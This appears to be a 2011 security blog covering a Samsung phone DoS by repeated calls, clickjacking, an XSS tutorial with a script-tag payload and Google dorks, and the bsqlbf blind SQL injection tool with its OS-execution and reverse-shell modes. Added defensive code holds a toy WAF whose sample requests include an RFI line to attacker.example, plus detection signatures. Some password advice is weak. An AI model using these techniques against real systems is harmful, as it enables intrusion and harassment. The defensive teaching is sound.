    Let's take the above example again. Mak's mobile number is in the reject list of Bob's Samsung phone, so when Mak calls Bob his call ends immediately, with a missed call alert on Bob's phone. But what if Mak calls Bob every few seconds? Then it performs a DoS on Bob's Samsung mobile phone: if Mak calls Bob again and again, seconds apart, using his phone's auto redial function, Bob is unable to receive anyone else's calls, because the phone shows busy to any other caller calling Bob. Bob cannot even make calls, listen to music or videos, or capture photos, because the phone continuously shows missed call alerts of Mak's calls.

    It happens because the missed call alert takes a long time to leave the phone's screen. Samsung could add a function like some Chinese phones have: they just don't show any alert on the mobile screen and only keep entries of blocked calls.

    Anyone can just give missed calls to that mobile number for some time, so that the user of the Samsung mobile phone adds the number to the auto reject list; then you can register on mobivox or a similar service and just write an AutoIt3 script or similar to give missed calls to the person, and it's a DoS on his Samsung mobile.

    Author : Ashish Mistry, Founder of Hcon
    Information Security Researcher, Penetration Tester, Malware Researcher, Trainer


    Friday, November 4, 2011

    Find If A Website Is safe To Open or not using Online sites and Tools

    In the last post, we explained how to check whether a site is safe or not using McAfee Advisor. Now I am going to introduce some other sites and tools for testing whether a site is safe to open or not.

    Websites to check sites:

    Norton Safeweb:
    Norton Safeweb is a free online application provided by Norton Security. It works the same way as McAfee Advisor.
    You can check the site safety here:

    Google Safe Browsing:
    Google Safe Browsing will analyze the site for malware. It will also report the status of the site in past months.
    URL to check:
    replace the with your target site.

    If you manually find any sites spreading malware, you can report them here:

    AVG Link Scanner:
    AVG Link Scanner is a free tool that also works like McAfee Advisor.

    • Checks each web page in real time before it opens on your computer
    • Automatically updates whenever a new threat is discovered
    Download it from here:

    Don't forget to check your own site frequently. Attackers can inject malicious scripts into your site too.

    Thursday, November 3, 2011

    What is Clickjacking Attack? How to Prevent? | UI Redressing

    Will answering a simple maths quiz delete your social network account? If your answer is "No", then check this news, Linkedin Clickjacking Vulnerability, and come back. Will visiting a website turn on your webcam? The answer is "Yes". Check this Flash player clickjacking vulnerability.

    If you read the above news completely, it will be easy for you to understand what clickjacking is. Ok, let's continue with our article.
    Clickjacking, also known as UI Redressing, is a malicious technique of tricking users into clicking a button or image that will run a hidden malicious script from another site.
    An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the innocuous page. Thus an attacker hijacks the click and sends it to another website. That's why it is known as Clickjacking (Click + Hijacking). The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

    Let's take the real-world example, the Linkedin clickjacking vulnerability.
    The above image may look like a simple maths problem. Once you click the submit button, it will delete your Linkedin account (if you are logged in) without asking any questions.

    Clickjacking attacks can be used for:
    • Tricking users into turning on their webcam and microphone using this Adobe vulnerability (this security flaw has been fixed by Adobe)
    • Getting more Twitter followers
    • Posting on your Facebook wall.
    • Deleting your profile.

    Prevention Techniques:

    Client Side (Security tips for users):
    Flash Player:
    Update your Flash Player (old versions are vulnerable to clickjacking).

    Browser Security Add-ons:
    NoScript is a Mozilla add-on that provides protection against clickjacking, XSS and other malicious scripts. NoScript is available for mobiles also.

    Comitari Web Protection Suite: Comitari provides client-side protection against ClickJacking (aka UI Redressing) attacks. Installed as a browser add-on.

    GuardedID: a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames.

    Server Side (For Developers)
    Frame Killer:
    A framekiller is a JavaScript snippet that can be used in a web page to prevent the page from being loaded inside frames from different sources. This provides security against frame-based clickjacking.
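The frame-killer idea above, as an added example that is not code from the original post: the classic check is "am I the top-level window?", and if not, the page navigates the whole tab to itself so the attacker's overlay disappears. The snippet below is written so it can be exercised in Node.js against a stand-in `makeWindow` object (the real thing uses the browser's `window`). It goes one step beyond the post by also showing the response headers a server can send so the browser refuses to frame the page at all; the URLs and the fake window are constructed for this illustration.

```javascript
// Added example (not the post's code): frame-killer logic written so it can be
// run in Node against a fake window object, plus the server-side headers that
// make the browser refuse to frame the page. URLs and makeWindow() are
// constructed for this illustration; in a real page use the global `window`.

// True when the document is not the top-level browsing context, i.e. framed.
function isFramed(win) {
  return win.self !== win.top;
}

// Frame killer: if framed, replace the top-level document with this page.
// Returns the location the top window ends up with so it can be checked.
function frameKiller(win) {
  if (isFramed(win)) {
    win.top.location = win.self.location;
  }
  return win.top.location;
}

// Server-side alternative (beyond what the post lists): headers that tell the
// browser not to render this response inside any frame. The CSP directive is
// the modern form; X-Frame-Options is kept for older browsers.
function frameProtectionHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Minimal stand-in for the browser window object: `self` is the page itself and
// `top` is either the page (not framed) or a separate attacker document.
function makeWindow({ framed, pageUrl, framerUrl }) {
  const page = { location: pageUrl };
  page.self = page;
  page.top = framed ? { location: framerUrl } : page;
  return page;
}

// Simulate the post's quiz page being loaded inside an attacker's frame.
function simulateFramedLoad() {
  const win = makeWindow({
    framed: true,
    pageUrl: 'https://victim.example/delete-account', // constructed
    framerUrl: 'https://attacker.example/maths-quiz',  // constructed
  });
  const before = win.top.location;
  const after = frameKiller(win);
  return { before, after };
}
```

A practitioner caveat: frame-busting scripts can be neutralised by the framing page (for instance by loading the target in an iframe with the `sandbox` attribute so its script never runs), which is why the header-based defence is the one to rely on and the script is at best a fallback.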

    How to Hide email address when sending mail to Multiple Recipients

    Recently, I got a mail from my institute (where I learned Java) regarding an interview. When I looked into the To address, it included other email addresses (including girls' email addresses). This is not a big matter when you send mail within an organization. But what if you send it to others?

    Just for fun:
    Just imagine you have two girlfriends and forward some interesting mail to both. If either of them notices the To address, you will end up in hospital.

    If you would like to hide email addresses from other recipients while sending to multiple recipients, this article will explain how to do it. I believe this will be helpful for organizations and for those concerned about security.

    How to do it?
    It is very simple.

    Whenever you send mail to a group of addresses, fill the addresses into the BCC field instead of the To field (leave the To field empty).

    BCC stands for Blind Carbon Copy.

    The receiver will see the sender and his own address.
    He can't see the others' addresses.

    Wednesday, November 2, 2011

    Could Your Bad Password Habits Come Back To Haunt You?

    According to Business Insider, the CEO of a major social network used its trusted database of user passwords in order to hack into one of its user’s email accounts. The hack was based on the guess that this user probably accessed all of their accounts using the same password.

    Although the cloud has provided us with some amazing new tools, it’s also created the need for increased end-user education and policy enforcement.

    Yes, it’s true that nearly all cloud providers act ethically. They invest heavily in security as a means of protecting their reputations. But also, there are laws which strictly dictate how they must handle and protect their client data.

    In fact, most data leaks and privacy breaches are the result of “insider jobs” by people who had physical access to the victim’s computer or storage media. (It would be much easier for me to steal your laptop from your home, than for me to break into Google’s datacenter and steal the hard drive that stores your Gmail content).  But it only takes one bad apple or one security leak to put your password into the wrong hands. And once that happens, then all of the other accounts which depend on this password will be compromised.

    There are a number of ways that you can protect yourself from the possibility of having your password stolen in this manner.

    One simple way would be to make use of sites which feature single sign-on (such as OpenID), or where a single login lets you access multiple services (like your Google account). There are also a number of specialized apps which let you manage multiple online accounts from a single interface. This has the advantage that your credentials are only stored in a single central repository. (Every time you make a copy of a password, the chances of a data breach go up.) Of course, this still leaves you open to a breach in the event that someone steals your password, but at least it makes such breaches more difficult. Also, such a breach might leave suspicious activity patterns that could get flagged and blocked. (e.g. many SaaS providers can block or flag access coming in from an anonymizing proxy.)

    The ideal scenario would be to have some sort of multi-factor authentication that requires access from a specified IP address. At the moment, only a few SaaS apps offer this ability.

    If you choose to aggregate your credentials in this manner, you should only do so for low-priority online services. Any services that require the handling of sensitive information should have their own dedicated unique highly-random passwords.

    Another method for managing multiple accounts using a single set of credentials would be to use a single password which is scrambled using a hint that is unique to the account in question. For example, a user whose password is “pUpp1e5” could combine this password with the web site name and create an MD5 hash, where the first 10 characters would be the new password. So the password+site string “pUpp1e5” might hash to “50f49dd6f3f838fb74ca1b7de5898c48”, and the new password would be 50f49dd6f3.
    But the absolute best way to prevent your passwords from being used against you would be to generate and memorize completely random passwords for every account you open. Although this takes a bit of discipline, it's not as hard as it sounds.

    Many people will rely on mnemonic systems which turn these passwords into easy-to-visualize sentences.
    For example:
    “Y!14gtP” could be turned into “Yolanda surprised 14 green turtles named Peter”
    Although these mnemonic systems are ok for short-term memorization, I’ve found that their effectiveness is overrated. For a number of reasons - which would take too long to go into for this article – I find that there’s no substitute for good old-fashioned memorization through repetition.

    Here is a technique that works for me.
    • Step 1: Generate a random password and memorize it mnemonically or write it down somewhere safe. (Maybe an encrypted file)
    • Step 2: Log in and out 5 times in a row to build muscle memory.
    • Step 3: The next day, log in and out again 5 times using the new password.
    • Step 4: One week later, log in and out again 5 times using the new password.
    You can now go ahead and destroy the written or saved copy of the password. By this point, you should have the password memorized for life. (Or until you’re ready to change it again)
    Now that we’re living in the “cloud age”, users need to be more aggressive than ever when it comes to maintaining effective password management habits.
    About The Author:
    For over ten years, Storagepipe has been providing online server backup services that help companies maintain the safety, security and confidentiality of their private data.


    Saturday, October 15, 2011

    Certified Ethical Hacker(CEH) 312-50-v7 Practice Test from Ucertify

    Ethical Hacking Tutorials Blog is introducing a new feature called Certification Preparation Showcase to introduce blog readers to certification preparation education providers and their products. This independent review will highlight the features available in the offerings so that blog readers are aware of the vendors. This blog does not endorse or recommend any specific vendor. Certification candidates should use their best judgment before buying any products or services reviewed on this blog. EC-Council Advisor hopes that Certification Preparation Showcase will assist blog readers in the evaluation of certification related products or services.

    The first product being reviewed in the Cert Prep Showcase is the uCertify PrepKit from uCertify LLC. The company has been offering certification preparation study kits for more than a decade. The current portfolio covers certification study material for leading companies such as Microsoft, EC-Council, Cisco, IBM and others.

    The certification preparation material is available as a download, with a 15-question diagnostic test available for free. If you have bought the kit, a license key will reach your e-mail inbox to activate the complete features of the kit. The exam PrepKit consists of a Test Engine with multiple simulated tests. For review purposes, I downloaded the 312-50-v7 Certified Ethical Hacker V7 kit. There are 5 full-length practice tests and 1 'Final Test' to prepare oneself for the actual exam. One can also create a custom test and a fixed-time test using the question bank in the test engine.

    The test kit also provides nearly 300 flash cards, study notes and tips for taking the exam. The test kit covers all the sections mentioned in the exam content on the certification website. The test engine has been built to closely resemble the testing platform one would encounter for an actual exam. So preparing for a certification exam using the PrepKit will be a familiar experience on exam day. The best benefit of a Test PrepKit like this would be to use as a test simulation tool rather than a guide to learn concepts. There are several EC-Council Press and other publications available for reference guides.

    EC-COUNCIL Advisor: Please tell us about your company. From when did you start offering EC-Council Certification prep kits?

    Jon: uCertify is a leading training provider for the IT Certifications exams. For the past 15 years, uCertify has specialized in exam preparation solutions for all major certification exams, from vendors, such as Microsoft, EC-Council, Adobe, CompTIA, Cisco, EC Council and more. We are available 24 x 7 x 365. All uCertify PrepKits come with a 100% money back guarantee, which is the best in the business. Students pass in their first attempt using our prepkits, else we refund the cost of the prepkit. uCertify is committed to serving its customers with innovative, reliable, and high-quality products through constant research and development, keeping in mind the latest pattern of the various exams. We began offering our prepkits for EC-Council certifications back in 2003. Since then, we have continuously added to the EC-Council test prep suite keeping up with EC-Council’s certification offerings, including all Sun based prepkits.

    EC-Council Advisor: When would you recommend a candidate to start using your prep kit?

    Jon: We recommend that students begin using our prepkits as soon as possible. Our prepkits provide information about exam objectives, lots of study material and dozens of practice questions which not only help reinforce concepts, but hone practice skills until they have achieved mastery of the subject.

    EC-COUNCIL Advisor: Tell us how you develop the practice tests?

    Jon: Our prepkits are crafted by industry experts from within uCertify, as well as from the field. They are typically certified professionals themselves, and are subject matter experts in the area of certification they are writing for. These professionals understand the problems that students face while preparing for their certification exams, and ensure that the prepkit material they author helps students pass their certification exam on their first attempt.

    EC-COUNCIL Advisor: You advertise a very high success rate in certification exams (98% plus) for your customers. What makes that possible?

    Jon: uCertify places a very high emphasis on content quality. Our content authors, be it in-house uCertify employees, or contracted IT professionals with relevant experience, are held to extremely high standards. In addition to stringent checklists and peer reviews, several prepkits are also reviewed by ProCertLabs, a company regarded by many certification vendors, as being very qualified to review a test prep provider’s work. Every piece of material in our prepkits is authored and reviewed via a strict checklist to ensure high quality standards.

    EC-COUNCIL Advisor: What advice would you give to EC-Council certification candidates preparing for certification exams?

    Jon: Practice, Practice, Practice! Invest in a high quality prepkit provider such as uCertify, and go through all study material, and take/retake the tests until they score 95% or higher in all the practice tests they take. Readers of EC-COUNCIL blog can use discount code: UCPREP when checking out and avail of a 10% discount. 

    Friday, October 14, 2011

    Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

    What is XSS?
    Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

    In a typical XSS attack, a hacker injects his malicious JavaScript code into the legitimate website. When a user visits the specially-crafted link, the malicious JavaScript executes. A successfully exploited XSS vulnerability allows attackers to perform phishing attacks, steal accounts and even spread worms.
    Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injects a malicious script. When a user visits the site, the malicious script executes. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using these stolen cookies, he can log into your account and change the password.
    It will be easy to understand XSS if you have the following prerequisites:
    • Strong knowledge of HTML and JavaScript (Reference).
    • Basic knowledge of the HTTP client-server architecture (Reference)
    • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

    XSS Attack:
    Step 1: Finding a Vulnerable Website
    Hackers use Google dorks for finding vulnerable sites, for instance "?search=" or ".php?q=". 1337s target specific sites instead of using Google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

    Step 2: Testing the Vulnerability:
    First of all, we have to find an input field so that we can inject our own script, for example a search box, username, password or any other input field.

    Test 1:
    Once we have found the input field, let us try to put some string inside the field; for instance, let me input "BTS". It will display the result.

    Now right-click on the page and select View Source. Search for the string "BTS" which we entered in the input field. Note the location where the input is placed.

    Test 2:
    Now we are going to check whether the server sanitizes our input or not. In order to do this, let us input the <script> tag inside the input field.
    View the source of the page. Find the location where the input was displayed in the previous test.

    Thank god, our code is not being sanitized by the server and the code is just the same as what we entered in the field. If the server sanitized our input, the code would look like this: &lt;script&gt;. This indicates that the website is vulnerable to XSS and we can execute our own scripts.

    Step 3: Exploiting the vulnerability
    Now we know the site is somewhat vulnerable to XSS. But let us make sure whether the site is completely vulnerable to this attack by injecting full JavaScript code. For instance, let us input <script>alert('BTS')</script>.

    Now it will display a pop-up box with the 'BTS' string. Finally, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.

    Types of XSS based on persistence capability:
    Based on persistence capability, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

    Persistent XSS:

    The Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database, and is then permanently run in the normal page.

    For Example:
    Many websites host a support forum where registered users can ask their questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input provided, it results in execution of the injected script. The code will be executed whenever a user tries to read the post. If the injected code is cookie-stealing code, then it will steal the cookies of users who read the post. Using the cookie, the attacker can take control of your account.

    Non-Persistent XSS:

    Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server via an HTTP request. The server embeds the input in the HTML file and returns the file (HTTP response) to the browser. When the browser renders the HTML file, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

    Let us consider a project hosting website. To find our favorite project, we just input the related word in the search box. When the search is finished, it will display a message like this: "search results for yourword". If the server fails to sanitize the input properly, it results in execution of the injected script.

    In the case of reflected XSS attacks, the attacker sends the specially-crafted link to victims and tricks them into clicking the link. When the user clicks the link, the browser sends the injected code to the server, the server reflects the attack back to the user's browser, and the browser then executes the code.

    In addition to these types, there is also a third type of attack called DOM-based XSS; I will explain this attack in later posts.
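The "search results for yourword" page just described is the textbook reflected case, and the post's Test 2 (type a tag, view source, see whether it came back unchanged) is the check every developer can automate. Here is an added example, not code from the original post, that shows both: a vulnerable renderer beside its fixed version, the output encoder that turns `<script>` into `&lt;script&gt;` as the post describes, and a function that performs the view-source check against either renderer. The page template and the marker string are constructed for this illustration.

```javascript
// Added example (not the post's code): output encoding for the reflected
// "search results for yourword" page, and the post's view-source test made
// automatic. The marker string and the page template are constructed here.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that can change HTML structure. Apply this at output
// time, when data is placed into HTML text; other contexts (attribute values,
// JavaScript strings, URLs) need their own encoders, not this one.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable version: the search term is concatenated straight into the page,
// exactly the situation described for the project-hosting search box.
function renderSearchVulnerable(term) {
  return `<p>search results for ${term}</p>`;
}

// Fixed version: the same page with the term escaped before it reaches HTML.
function renderSearchSafe(term) {
  return `<p>search results for ${escapeHtml(term)}</p>`;
}

// Test 2 from the post, automated: submit a harmless tag around a marker and
// check whether the page source contains it unchanged. `render` is the page
// under test; returning true means input is reflected without sanitization.
function reflectsRawMarkup(render, marker = 'BTS') {
  const probe = `<b>${marker}</b>`;
  return render(probe).includes(probe);
}

// Run the check against both renderers and report which one is vulnerable.
function compareRenderers() {
  return {
    vulnerable: reflectsRawMarkup(renderSearchVulnerable),
    safe: reflectsRawMarkup(renderSearchSafe),
  };
}
```

The probe uses a harmless `<b>` tag rather than a script tag because the question being answered is only "does markup survive the round trip?"; if it does, the page will also execute a script, so there is no need to inject one to prove the point.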

    What can an attacker do with this vulnerability?
    • Stealing identity and confidential data (credit card details).
    • Bypassing restrictions in websites.
    • Session hijacking (stealing sessions)
    • Malware attacks
    • Website defacement
    • Denial of Service attacks (DoS)

    This article is intended for educational purpose only.

    Wednesday, October 12, 2011

    Introduction to Web Application Firewall (WAF) ~ Website Security

    What is WAF?
    WAF stands for Web Application Firewall. A WAF is a server-side application that controls the input and output (it filters the HTTP communication). It controls network traffic on any OSI layer up to the Application Layer. The main purpose of a WAF is to provide better protection against the top web application vulnerabilities such as XSS (Cross Site Scripting), SQL Injection and RFI. Daily, lots of websites are hacked because of these vulnerabilities. Read our Security News section to learn about the security risks on the Internet. A standard firewall blocks non-HTTP attacks (restriction of ports, access, etc.). A WAF blocks HTTP attacks.

    The Most common Web Application Vulnerabilities:

    • SQL Injection(SQLi)
    • Cross-Site Scripting (XSS)
    • Broken Authentication and Session Management
    • Insecure Direct Object References
    • Cross-Site Request Forgery (CSRF)
    • Security Misconfiguration
    • Insecure Cryptographic Storage
    • Failure to Restrict URL Access
    • Insufficient Transport Layer Protection
    • Unvalidated Redirects and Forwards

    The Web Application Firewall (WAF) must meet the following features:
    • Protection Against Top Vulnerability(XSS,SQLi,..etc)
    • Very Few False Positives (i.e., should NEVER disallow an authorized request)
    • Strength of Default (Out of the Box) Defenses
    • Power and Ease of Learn Mode
    • Types of Vulnerabilities it can prevent.
    • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
    • Both Positive and Negative Security model support.
    • Simplified and Intuitive User Interface.
    • Cluster mode support.
    • High Performance (milliseconds latency).
    • Complete Alerting, Forensics, Reporting capabilities.
    • Web Services\XML support.
    • Brute Force protection.
    • Ability to Active (block and log), Passive (log only) and bypass the web traffic.
    • Ability to keep individual users constrained to exactly what they have seen in the current session
    • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
    • Form Factor: Software vs. Hardware (Hardware generally preferred)
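Several of the features in that list (active versus passive mode, positive and negative security model, protection against XSS, SQLi and RFI) can be shown in a few dozen lines. The following is an added example, not code from the original post or from any of the products named below: a toy request inspector with a small signature set (negative model), a per-page allowlist of parameter shapes (positive model), and the two operating modes. The signatures, parameter shapes and sample request lines are constructed for this illustration and are nowhere near a production rule set.

```javascript
// Added example (not the post's code): a toy request inspector showing the
// active (block and log) and passive (log only) modes named in the feature
// list, a negative (signature) rule set and a positive (allowlist) rule set.
// The signatures, parameter shapes and sample requests are constructed for
// this illustration; they are not a usable production rule set.

// Negative model: patterns that should never appear in a parameter value.
const SIGNATURES = [
  { name: 'xss-script-tag', re: /<\s*script\b/i },
  { name: 'sqli-tautology', re: /\b(or|and)\s+['"]?\d+['"]?\s*=\s*['"]?\d+/i },
  { name: 'rfi-remote-url', re: /^(https?|ftp):\/\//i },
];

// Positive model: the shape each known parameter of a page is allowed to have.
const POSITIVE_RULES = {
  '/search.php': { q: /^[\w .-]{1,64}$/ },
  '/RFI.php': { filename: /^[a-z]{1,32}$/ },
};

// Parse an HTTP request line such as "GET /search.php?q=BTS HTTP/1.1" into
// path and decoded query parameters; null when it is not a valid request line.
function parseRequestLine(line) {
  const m = /^(\w+)\s+(\S+)\s+HTTP\/[\d.]+$/.exec(line);
  if (!m) return null;
  const u = new URL(m[2], 'http://waf.local'); // base is only needed to parse the path
  return { method: m[1], path: u.pathname, params: Object.fromEntries(u.searchParams) };
}

// Inspect one request. mode is 'active' (block and log) or 'passive' (log only).
function inspect(line, mode = 'active') {
  const verdict = mode === 'active' ? 'block' : 'log';
  const req = parseRequestLine(line);
  if (!req) return { action: verdict, findings: ['unparseable-request'] };
  const findings = [];
  const rules = POSITIVE_RULES[req.path] || {};
  for (const [name, value] of Object.entries(req.params)) {
    for (const sig of SIGNATURES) {
      if (sig.re.test(value)) findings.push(`${sig.name}:${name}`);
    }
    if (rules[name] && !rules[name].test(value)) findings.push(`positive-model-violation:${name}`);
  }
  return findings.length === 0 ? { action: 'allow', findings } : { action: verdict, findings };
}

// Constructed sample traffic: one benign search and one request per attack class.
const SAMPLE_REQUESTS = [
  'GET /search.php?q=BTS HTTP/1.1',
  "GET /search.php?q=<script>alert('BTS')</script> HTTP/1.1",
  'GET /RFI.php?filename=http://attacker.example/shell.txt HTTP/1.1',
  'GET /item.php?id=1%20OR%201=1 HTTP/1.1',
];

function inspectAll(mode = 'active') {
  return SAMPLE_REQUESTS.map((line) => ({ line, ...inspect(line, mode) }));
}
```

Note how the positive rule catches the XSS and RFI requests even without a matching signature: a search term that is not plain text and a filename that is not a bare page name are wrong regardless of what payload they carry. That is the practical argument for the "both positive and negative security model" item in the list, and for running a new rule set in passive mode first to measure false positives before switching it to active.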
    Top 10 Open Source Web Application Firewalls (WAF):

    1. ModSecurity (Trustwave SpiderLabs)
    2. AQTRONIX WebKnight
    3. ESAPI WAF
    4. WebCastellum
    5. BinarySec
    6. Guardian@JUMPERZ.NET
    7. OpenWAF
    8. Ironbee
    9. Profense
    10. Smoothwall

    Tuesday, October 11, 2011

    Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

    What is Blind SQL Injection:
    Some websites are vulnerable to SQL Injection but the results of the injection are not visible to the attacker. In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
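The paragraph above describes the defining signature of boolean-based blind injection from the server's point of view: many requests to the same page and parameter that differ only by a condition that is true in one request and false in the next, with the response size changing accordingly. That pattern is detectable in ordinary access logs. Here is an added example, not code from the original post or from bsqlbf, that looks for exactly that in combined-format log lines. The log lines, the IP addresses and the page names are constructed for this illustration.

```javascript
// Added example (not the post's code, not bsqlbf): detect boolean-based blind
// SQL injection probing in access logs. A probe is recognised by request pairs
// to the same page and parameter that differ only in an injected condition
// which is true in one request and false in the other. Log lines, addresses
// and page names below are constructed for this illustration.

// An injected comparison such as "AND 1=1" / "AND 1=2"; groups 2 and 3 are the
// two sides, so the truth value can be computed without evaluating SQL.
const CONDITION = /\b(and|or)\s+(\d+)\s*=\s*(\d+)\b/i;

// Parse one combined-log line: ip - - [time] "GET /path?x=y HTTP/1.1" status size
function parseLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) HTTP\/[\d.]+" (\d{3}) (\d+|-)/.exec(line);
  if (!m) return null;
  const u = new URL(m[4], 'http://log.local'); // base is only needed to parse the path
  return { ip: m[1], path: u.pathname, params: [...u.searchParams], status: Number(m[5]), size: m[6] };
}

// Group injected conditions by client, page and parameter; flag a group when
// both true and false conditions were seen, and note whether the responses
// differed in size (the "displays differently" signal the post describes).
function detectBooleanProbing(lines) {
  const groups = new Map();
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    for (const [name, value] of req.params) {
      const c = CONDITION.exec(value);
      if (!c) continue;
      const key = `${req.ip} ${req.path} ${name}`;
      const g = groups.get(key) || { trueSizes: new Set(), falseSizes: new Set(), count: 0 };
      (c[2] === c[3] ? g.trueSizes : g.falseSizes).add(req.size);
      g.count += 1;
      groups.set(key, g);
    }
  }
  const findings = [];
  for (const [key, g] of groups) {
    if (g.trueSizes.size > 0 && g.falseSizes.size > 0) {
      const responsesDiffer = [...g.trueSizes].some((s) => !g.falseSizes.has(s));
      findings.push({ key, probes: g.count, responsesDiffer });
    }
  }
  return findings;
}

// Constructed sample log: one client probing /item.php, one browsing normally.
const SAMPLE_LOG = [
  '203.0.113.7 - - [11/Oct/2011:10:00:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 5120',
  '203.0.113.7 - - [11/Oct/2011:10:00:02 +0000] "GET /item.php?id=5%20AND%201=1 HTTP/1.1" 200 5120',
  '203.0.113.7 - - [11/Oct/2011:10:00:03 +0000] "GET /item.php?id=5%20AND%201=2 HTTP/1.1" 200 4310',
  '203.0.113.7 - - [11/Oct/2011:10:00:04 +0000] "GET /item.php?id=5%20AND%202=2 HTTP/1.1" 200 5120',
  '198.51.100.4 - - [11/Oct/2011:10:00:05 +0000] "GET /item.php?id=7 HTTP/1.1" 200 5230',
  '198.51.100.4 - - [11/Oct/2011:10:00:06 +0000] "GET /search.php?q=rock%20and%20roll HTTP/1.1" 200 800',
];
```

A real tool sends hundreds of such pairs per extracted value, so in production the `probes` count per client and parameter is the number to alert on; the `responsesDiffer` flag tells the responder whether the probing was actually working, which is what decides whether data may have been recovered. The phrase "rock and roll" in the last line shows why the condition must require a numeric comparison, not just the keyword.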

    There are plenty of automated Blind SQL Injection tools available. Here I am introducing one of them, named bsqlbf (expanded as Blind SQL Injection Brute Forcer).

    This tool is written in Perl and allows extraction of data from blind SQL injections. It accepts custom SQL queries as a command-line parameter and works for both integer- and string-based injections.
    Supported databases:
    • MS-SQL
    • MySQL
    • PostgreSQL
    • Oracle

    The tool supports 8 attack modes(-type switch):-
    Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

    Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

    Type 2: Blind SQL Injection in "order by" and "group by".

    Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

    Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

    Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

    Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

    Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

    -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

    Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

    -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

    For Type 4(O.S code execution) the following methods are supported:

    -stype: How you want to execute command:

    SType 0 (default) is based on java..will NOT work against XE.

    SType 1 is against oracle 9 with plsql_native_make_utility.

    SType 2 is against oracle 10 with dbms_scheduler.

    This article is for education purposes only. The above mentioned software is developed for penetration testers to test their own web application vulnerabilities.

    © Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com